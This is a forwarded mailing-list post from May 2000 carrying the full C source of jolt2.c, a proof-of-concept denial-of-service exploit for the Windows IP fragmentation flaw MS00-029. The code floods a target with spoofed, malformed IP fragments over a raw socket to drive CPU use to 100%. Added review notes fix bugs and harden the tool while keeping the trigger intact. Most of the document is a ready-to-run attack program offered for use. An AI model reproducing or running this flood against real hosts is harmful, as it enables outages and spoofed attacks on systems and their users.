FW: Windows DoS code (jolt2.c) (fwd)
From: marc () EEYE COM (Marc)
Date: Thu, 25 May 2000 13:33:34 -0700
Someone was asking for this a few days ago... so here it is. Signed, Marc Maiffret Chief Hacking Officer eCompany / eEye T.949.675.8194 F.949.675.8294 http://eEye.com | -----Original Message----- | From: Windows NTBugtraq Mailing List | [mailto:NTBUGTRAQ () LISTSERV NTBUGTRAQ COM]On Behalf Of Phonix Monkey | Sent: Thursday, May 25, 2000 8:42 AM | To: NTBUGTRAQ () LISTSERV NTBUGTRAQ COM | Subject: Windows DoS code (jolt2.c) (fwd) | | | This is code for the new DoS discovered by Razor a few days ago. It | forces cpu utilization to 100%, making everything move really really | slow. Tested against Win98, WinNT4/sp5,6, Win2K. | | An interesting side note is that minor changes to this packet cause | NT4/Win2k (maybe others, not tested) memory use to jump | *substantially* (+70 meg non-paged-pool on a machine with 196 mb | phys). There seems to be a hard upper limit, but on machines with smaller | amounts of memory or smaller swapfiles, ramping up the non-paged-pool this | much might lead to a BSOD. | | .phonix. | | | | | /* | * File: jolt2.c | * Author: Phonix <phonix () moocow org> | * Date: 23-May-00 | * | * Description: This is the proof-of-concept code for the | * Windows denial-of-service attack described by | * the Razor team (NTBugtraq, 19-May-00) | * (MS00-029). This code causes cpu utilization | * to go to 100%. | * | * Tested against: Win98; NT4/SP5,6; Win2K | * | * Written for: My Linux box. YMMV. Deal with it. | * | * Thanks: This is standard code. Ripped from lots of places. | * Insert your name here if you think you wrote some of | * it. It's a trivial exploit, so I won't take credit | * for anything except putting this file together. 
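 */

/*
 * Review notes (added on review, code otherwise as posted):
 *
 *  - Requires root / CAP_NET_RAW: SOCK_RAW + IP_HDRINCL.
 *  - Linux-specific: relies on glibc's struct iphdr / icmphdr / udphdr
 *    layouts and on Linux raw-socket semantics.
 *  - The inconsistent IP total length, fragment offset and UDP length
 *    written below are the trigger for MS00-029 and are deliberately
 *    left exactly as in the original PoC.  Do not "fix" them.
 *  - Fixes applied vs. the posted listing: the -s option wrote into the
 *    destination variable instead of the source; socket() failure was
 *    tested with `!fd` (socket() returns -1, so a failure was never
 *    caught and fd 0 was closed by quit()); a string literal in usage()
 *    contained a raw line break (not valid C); gethostname() result was
 *    unchecked and not guaranteed NUL-terminated; gethostbyname() result
 *    was copied without checking the address family/length; getopt()
 *    was compared against EOF instead of -1; atoi() accepted junk;
 *    missing <stdlib.h>/<unistd.h>/<errno.h>; sendto() errors were
 *    silently ignored in a tight loop; `struct _pkt` used a reserved
 *    identifier.
 */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1   /* gethostname(), BSD-style socket types */
#endif

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <getopt.h>

/*
 * Wire image of one fragment: IPv4 header, then either an ICMP or a UDP
 * header, then a single payload byte.  Only the first iplen+hdrlen+1
 * bytes are ever sent.
 */
struct jolt_pkt
{
    struct iphdr ip;
    union {
        struct icmphdr icmp;
        struct udphdr udp;
    } proto;
    char data;
} pkt;

int icmplen = sizeof(struct icmphdr),
    udplen = sizeof(struct udphdr),
    iplen = sizeof(struct iphdr),
    spf_sck = -1;   /* raw socket; -1 until opened so quit() never closes fd 0 */

/* Print usage and exit(0). UDP mode is selected by giving -p. */
void usage(char *pname)
{
    fprintf(stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n", pname);
    fprintf(stderr, "Note: UDP used if a port is specified, otherwise ICMP\n");
    exit(0);
}

/*
 * Resolve a dotted quad or host name to an IPv4 address in network byte
 * order.  Returns 0 (== 0.0.0.0, never a usable address here) on failure,
 * on a non-AF_INET answer, or on an address whose length is not 4 bytes.
 * Note: a non-numeric name triggers a resolver lookup.
 */
in_addr_t host_to_ip(char *host_name)
{
    struct in_addr addr;
    struct hostent *res = gethostbyname(host_name);

    if (res == NULL || res->h_addrtype != AF_INET
        || res->h_addr_list == NULL || res->h_addr_list[0] == NULL
        || res->h_length != (int)sizeof addr)
        return 0;
    memcpy(&addr, res->h_addr_list[0], sizeof addr);
    return addr.s_addr;
}

/* Report a failed system call via perror(), release the raw socket, exit. */
void quit(char *reason)
{
    perror(reason);
    if (spf_sck >= 0)
        close(spf_sck);
    exit(EXIT_FAILURE);
}

/* Report a usage/validation error (no errno involved) and exit. */
static void die(const char *msg)
{
    fprintf(stderr, "%s\n", msg);
    if (spf_sck >= 0)
        close(spf_sck);
    exit(EXIT_FAILURE);
}

/*
 * Build the malformed fragment once and send it forever on sck.
 *
 * sck       raw socket with IP_HDRINCL set
 * src_addr  spoofed source address (network byte order)
 * dst_addr  target address (network byte order)
 * port      0 -> ICMP echo fragment; otherwise UDP fragment to that port
 *
 * Never returns normally; exits via quit() only on a persistent sendto()
 * failure (transient ENOBUFS/EAGAIN/EINTR are ignored, as flooding a raw
 * socket routinely produces them).
 */
int do_frags(int sck, in_addr_t src_addr, in_addr_t dst_addr, int port)
{
    int bs = 0;
    size_t psize;
    struct sockaddr_in to;

    memset(&to, 0, sizeof to);
    to.sin_family = AF_INET;
    to.sin_port = 1235;   /* ignored by the kernel for raw sockets with IP_HDRINCL */
    to.sin_addr.s_addr = dst_addr;

    psize = (size_t)iplen + (size_t)(port ? udplen : icmplen) + 1;
    memset(&pkt, 0, psize);

    pkt.ip.version = 4;
    pkt.ip.ihl = 5;
    /* Deliberately bogus total length (as in the original PoC). */
    pkt.ip.tot_len = htons(iplen + icmplen) + 40;
    pkt.ip.id = htons(0x455);
    pkt.ip.ttl = 255;
    pkt.ip.protocol = port ? IPPROTO_UDP : IPPROTO_ICMP;
    pkt.ip.saddr = src_addr;
    pkt.ip.daddr = dst_addr;
    /* Fragment offset 8190*8 = 65520 with MF clear: the last fragment lands
     * past the 64K datagram limit.  This is the MS00-029 trigger. */
    pkt.ip.frag_off = htons(8190);
    /* ip.check left 0; Linux fills the IP checksum for IP_HDRINCL sockets. */

    if (port) {
        pkt.proto.udp.source = htons(port | 1235);
        pkt.proto.udp.dest = htons(port);
        pkt.proto.udp.len = htons(9);   /* bogus, as in the original */
        pkt.data = 'a';
    } else {
        pkt.proto.icmp.type = ICMP_ECHO;
        pkt.proto.icmp.code = 0;
        pkt.proto.icmp.checksum = 0;    /* left 0 as in the original PoC */
    }

    for (;;) {
        bs = (int)sendto(sck, &pkt, psize, 0, (struct sockaddr *)&to, sizeof to);
        if (bs < 0 && errno != ENOBUFS && errno != EAGAIN && errno != EINTR)
            quit("sendto");
    }
    return bs;   /* not reached */
}

/*
 * Entry point: parse [-s src] [-p port] dest, open a raw socket with
 * IP_HDRINCL (root / CAP_NET_RAW required) and hand off to do_frags().
 * The default source address is whatever this host's name resolves to.
 */
int main(int argc, char *argv[])
{
    in_addr_t src_addr, dst_addr;
    int opt, on = 1, port = 0;
    char hostname[256];

    if (argc < 2)
        usage(argv[0]);

    if (gethostname(hostname, sizeof hostname) < 0)
        quit("gethostname");
    hostname[sizeof hostname - 1] = '\0';   /* gethostname() need not terminate on truncation */
    src_addr = host_to_ip(hostname);

    while ((opt = getopt(argc, argv, "s:p:h")) != -1) {
        switch (opt) {
        case 's':
            src_addr = host_to_ip(optarg);   /* was wrongly stored in dst_addr */
            if (!src_addr)
                die("Bad source address given.");
            break;

        case 'p': {
            char *end;
            long v;
            errno = 0;
            v = strtol(optarg, &end, 10);
            if (end == optarg || *end != '\0' || errno == ERANGE
                || v <= 0 || v > 65535)
                die("Invalid port number given.");
            port = (int)v;
            break;
        }

        case 'h':
        default:
            usage(argv[0]);
        }
    }

    if (optind >= argc)
        usage(argv[0]);
    dst_addr = host_to_ip(argv[optind]);
    if (!dst_addr)
        die("Bad destination address given.");
    if (!src_addr)
        die("Could not determine a source address; use -s.");

    spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (spf_sck < 0)   /* socket() returns -1 on failure, never 0 here */
        quit("socket() (raw sockets need root / CAP_NET_RAW)");
    if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, &on, sizeof on) < 0)
        quit("IP_HDRINCL");

    do_frags(spf_sck, src_addr, dst_addr, port);
    return 0;
}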